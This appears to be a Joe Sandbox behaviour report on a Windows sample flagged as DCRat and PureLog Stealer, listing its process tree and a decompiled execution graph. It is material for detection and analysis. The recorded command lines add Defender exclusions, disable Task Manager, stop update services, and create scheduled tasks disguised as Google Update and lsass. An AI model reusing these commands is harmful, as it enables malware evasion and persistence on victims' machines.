                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 79%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:07:40:11
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:07:40:11
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:07:40:14
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe"
                                                              Imagebase:0x320000
                                                              File size:147'456 bytes
                                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:07:40:16
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat" "
                                                              Imagebase:0x240000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:8
                                                              Start time:07:40:16
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0xff0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:07:40:16
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                              Imagebase:0x3a0000
                                                              File size:59'392 bytes
                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:10
                                                              Start time:07:40:16
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                              Imagebase:0x7ff758520000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:07:40:17
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:12
                                                              Start time:07:40:17
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\sc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:sc stop UsoSvc
                                                              Imagebase:0x7ff600290000
                                                              File size:72'192 bytes
                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:13
                                                              Start time:07:40:17
                                                              Start date:13/01/2025
                                                              Path:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\containerperf/ServerComponenthostMonitorDll.exe"
                                                              Imagebase:0x220000
                                                              File size:68'597'760 bytes
                                                              MD5 hash:01287AA2A0B5D2178CB13C477A04DC21
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000000.1791002299.0000000000222000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.2245855345.00000000126BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\containerperf\ServerComponenthostMonitorDll.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\containerperf\ServerComponenthostMonitorDll.exe, Author: Joe Security
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 61%, ReversingLabs
                                                              Has exited:true

                                                              Target ID:14
                                                              Start time:07:40:17
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\sc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:sc stop WaaSMedicSvc
                                                              Imagebase:0x7ff600290000
                                                              File size:72'192 bytes
                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:15
                                                              Start time:07:40:17
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\sc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:sc stop wuauserv
                                                              Imagebase:0x7ff600290000
                                                              File size:72'192 bytes
                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:16
                                                              Start time:07:40:17
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\sc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:sc stop bits
                                                              Imagebase:0x7ff600290000
                                                              File size:72'192 bytes
                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:17
                                                              Start time:07:40:17
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\sc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:sc stop dosvc
                                                              Imagebase:0x7ff600290000
                                                              File size:72'192 bytes
                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:18
                                                              Start time:07:40:17
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                              Imagebase:0x7ff758520000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:19
                                                              Start time:07:40:17
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:20
                                                              Start time:07:40:17
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\dialer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\dialer.exe
                                                              Imagebase:0x7ff7ae220000
                                                              File size:39'936 bytes
                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:21
                                                              Start time:07:40:17
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:22
                                                              Start time:07:40:17
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:23
                                                              Start time:07:40:17
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powercfg /x -hibernate-timeout-ac 0
                                                              Imagebase:0x7ff7d4a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:24
                                                              Start time:07:40:18
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powercfg /x -hibernate-timeout-dc 0
                                                              Imagebase:0x7ff7d4a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:25
                                                              Start time:07:40:18
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powercfg /x -standby-timeout-ac 0
                                                              Imagebase:0x7ff7d4a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:26
                                                              Start time:07:40:18
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powercfg /x -standby-timeout-dc 0
                                                              Imagebase:0x7ff7d4a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:27
                                                              Start time:07:40:18
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\winlogon.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:winlogon.exe
                                                              Imagebase:0x7ff7cd660000
                                                              File size:906'240 bytes
                                                              MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:28
                                                              Start time:07:40:20
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\lsass.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\lsass.exe
                                                              Imagebase:0x7ff7a2ae0000
                                                              File size:59'456 bytes
                                                              MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:30
                                                              Start time:07:40:24
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                              Imagebase:0x7ff6eef20000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:31
                                                              Start time:07:40:25
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\dwm.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"dwm.exe"
                                                              Imagebase:0x7ff74e710000
                                                              File size:94'720 bytes
                                                              MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:32
                                                              Start time:07:40:28
                                                              Start date:13/01/2025
                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                              Imagebase:0x7ff622860000
                                                              File size:468'120 bytes
                                                              MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                              Has elevated privileges:true
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:33
                                                              Start time:07:40:28
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:34
                                                              Start time:07:40:30
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                              Imagebase:0x7ff6eef20000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:35
                                                              Start time:07:40:30
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                              Imagebase:0x7ff6eef20000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:36
                                                              Start time:07:40:31
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                              Imagebase:0x7ff6eef20000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:37
                                                              Start time:07:40:31
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                              Imagebase:0x7ff6eef20000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:40
                                                              Start time:07:40:32
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                              Imagebase:0x7ff6eef20000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:42
                                                              Start time:07:40:32
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline"
                                                              Imagebase:0x7ff74ddc0000
                                                              File size:2'759'232 bytes
                                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:43
                                                              Start time:07:40:32
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:44
                                                              Start time:07:40:32
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF04D.tmp" "c:\Windows\System32\CSCC4EE3A879404710AD2E4883A563BED.TMP"
                                                              Imagebase:0x7ff73a850000
                                                              File size:52'744 bytes
                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:47
                                                              Start time:07:40:33
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\schtasks.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\containerperf\lsass.exe'" /rl HIGHEST /f
                                                              Imagebase:0x7ff76f990000
                                                              File size:235'008 bytes
                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:414
                                                              Start time:07:40:37
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\Conhost.exe
                                                              Wow64 process (32bit):
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:
                                                              Has administrator privileges:
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:474
                                                              Start time:07:40:54
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\Conhost.exe
                                                              Wow64 process (32bit):
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:
                                                              Has administrator privileges:
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:504
                                                              Start time:07:41:10
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\Conhost.exe
                                                              Wow64 process (32bit):
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:
                                                              Has administrator privileges:
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:529
                                                              Start time:07:41:27
                                                              Start date:13/01/2025
                                                              Path:C:\Windows\System32\Conhost.exe
                                                              Wow64 process (32bit):
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:
                                                              Has administrator privileges:
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:9.3%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:9.4%
                                                                Total number of Nodes:1484
                                                                Total number of Limit Nodes:50
                                                                execution_graph 25417 161710 86 API calls 25376 17ad10 73 API calls 25340 17a400 GdipDisposeImage GdipFree 25401 17d600 70 API calls 25341 186000 QueryPerformanceFrequency QueryPerformanceCounter 25378 182900 6 API calls 4 library calls 25402 18f200 51 API calls 25419 18a700 21 API calls 25381 17f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25420 17ff30 LocalFree 24150 18bb30 24151 18bb39 24150->24151 24152 18bb42 24150->24152 24154 18ba27 24151->24154 24155 1897e5 _unexpected 38 API calls 24154->24155 24156 18ba34 24155->24156 24174 18bb4e 24156->24174 24158 18ba3c 24183 18b7bb 24158->24183 24161 18ba53 24161->24152 24164 18ba96 24166 188dcc _free 20 API calls 24164->24166 24166->24161 24168 18ba91 24207 1891a8 20 API calls __dosmaperr 24168->24207 24170 18bada 24170->24164 24208 18b691 26 API calls 24170->24208 24171 18baae 24171->24170 24172 188dcc _free 20 API calls 24171->24172 24172->24170 24175 18bb5a ___scrt_is_nonwritable_in_current_image 24174->24175 24176 1897e5 _unexpected 38 API calls 24175->24176 24177 18bb64 24176->24177 24181 18bbe8 _abort 24177->24181 24182 188dcc _free 20 API calls 24177->24182 24209 188d24 38 API calls _abort 24177->24209 24210 18ac31 EnterCriticalSection 24177->24210 24211 18bbdf LeaveCriticalSection _abort 24177->24211 24181->24158 24182->24177 24184 184636 __cftof 38 API calls 24183->24184 24185 18b7cd 24184->24185 24186 18b7dc GetOEMCP 24185->24186 24187 18b7ee 24185->24187 24189 18b805 24186->24189 24188 18b7f3 GetACP 24187->24188 24187->24189 24188->24189 24189->24161 24190 188e06 24189->24190 24191 188e44 24190->24191 24195 188e14 __dosmaperr 24190->24195 24213 1891a8 20 API calls __dosmaperr 24191->24213 24193 188e2f RtlAllocateHeap 24194 188e42 24193->24194 24193->24195 24194->24164 24197 18bbf0 24194->24197 24195->24191 24195->24193 24212 187a5e 7 API calls 2 library calls 24195->24212 24198 18b7bb 40 API calls 24197->24198 24199 18bc0f 24198->24199 24202 18bc60 IsValidCodePage 24199->24202 24204 18bc16 24199->24204 24206 18bc85 __cftof 24199->24206 24200 17fbbc _ValidateLocalCookies 5 API calls 24201 18ba89 24200->24201 24201->24168 24201->24171 24203 18bc72 GetCPInfo 24202->24203 24202->24204 24203->24204 24203->24206 24204->24200 24214 18b893 GetCPInfo 24206->24214 24207->24164 24208->24164 24210->24177 24211->24177 24212->24195 24213->24194 24215 18b977 24214->24215 24221 18b8cd 24214->24221 24218 17fbbc _ValidateLocalCookies 5 API calls 24215->24218 24220 18ba23 24218->24220 24220->24204 24224 18c988 24221->24224 24223 18ab78 __vsnwprintf_l 43 API calls 24223->24215 24225 184636 __cftof 38 API calls 24224->24225 24226 18c9a8 MultiByteToWideChar 24225->24226 24228 18c9e6 24226->24228 24235 18ca7e 24226->24235 24230 18ca07 __cftof __vsnwprintf_l 24228->24230 24231 188e06 __vsnwprintf_l 21 API calls 24228->24231 24229 17fbbc _ValidateLocalCookies 5 API calls 24232 18b92e 24229->24232 24233 18ca78 24230->24233 24236 18ca4c MultiByteToWideChar 24230->24236 24231->24230 24238 18ab78 24232->24238 24243 18abc3 20 API calls _free 24233->24243 24235->24229 24236->24233 24237 18ca68 GetStringTypeW 24236->24237 24237->24233 24239 184636 __cftof 38 API calls 24238->24239 24240 18ab8b 24239->24240 24244 18a95b 24240->24244 24243->24235 24245 18a976 __vsnwprintf_l 24244->24245 24246 18a99c MultiByteToWideChar 24245->24246 24247 18ab50 24246->24247 24248 18a9c6 24246->24248 24249 17fbbc _ValidateLocalCookies 5 API calls 24247->24249 24251 188e06 __vsnwprintf_l 21 API calls 24248->24251 24254 18a9e7 __vsnwprintf_l 24248->24254 24250 18ab63 24249->24250 24250->24223 24251->24254 24252 18aa9c 24280 18abc3 20 API calls _free 24252->24280 24253 18aa30 MultiByteToWideChar 24253->24252 24255 18aa49 24253->24255 24254->24252 24254->24253 24271 18af6c 24255->24271 24259 18aaab 24263 188e06 __vsnwprintf_l 21 API calls 24259->24263 24266 18aacc __vsnwprintf_l 24259->24266 24260 18aa73 24260->24252 24262 18af6c __vsnwprintf_l 11 API calls 24260->24262 24261 18ab41 24279 18abc3 20 API calls _free 24261->24279 24262->24252 24263->24266 24264 18af6c __vsnwprintf_l 11 API calls 24267 18ab20 24264->24267 24266->24261 24266->24264 24267->24261 24268 18ab2f WideCharToMultiByte 24267->24268 24268->24261 24269 18ab6f 24268->24269 24281 18abc3 20 API calls _free 24269->24281 24272 18ac98 __dosmaperr 5 API calls 24271->24272 24273 18af93 24272->24273 24276 18af9c 24273->24276 24282 18aff4 10 API calls 3 library calls 24273->24282 24275 18afdc LCMapStringW 24275->24276 24277 17fbbc _ValidateLocalCookies 5 API calls 24276->24277 24278 18aa60 24277->24278 24278->24252 24278->24259 24278->24260 24279->24252 24280->24247 24281->24252 24282->24275 25344 18c030 GetProcessHeap 25382 18b4ae 27 API calls _ValidateLocalCookies 25345 161025 29 API calls 25403 17c220 93 API calls _swprintf 25348 18f421 21 API calls __vsnwprintf_l 25349 17e455 14 API calls ___delayLoadHelper2@8 24330 17cd58 24332 17ce22 24330->24332 24335 17cd7b 24330->24335 24346 17c793 _wcslen _wcsrchr 24332->24346 24358 17d78f 24332->24358 24334 17d40a 24335->24332 24337 171fbb CompareStringW 24335->24337 24337->24335 24338 17ca67 SetWindowTextW 24338->24346 24343 17c855 SetFileAttributesW 24344 17c90f GetFileAttributesW 24343->24344 24356 17c86f __cftof _wcslen 24343->24356 24344->24346 24348 17c921 DeleteFileW 24344->24348 24346->24334 24346->24338 24346->24343 24349 17cc31 GetDlgItem SetWindowTextW SendMessageW 24346->24349 24352 17cc71 SendMessageW 24346->24352 24357 171fbb CompareStringW 24346->24357 24382 17b314 24346->24382 24386 17a64d GetCurrentDirectoryW 24346->24386 24388 16a5d1 6 API calls 24346->24388 24389 16a55a FindClose 24346->24389 24390 17b48e 76 API calls 2 library calls 24346->24390 24391 183e3e 24346->24391 24348->24346 24350 17c932 24348->24350 24349->24346 24351 164092 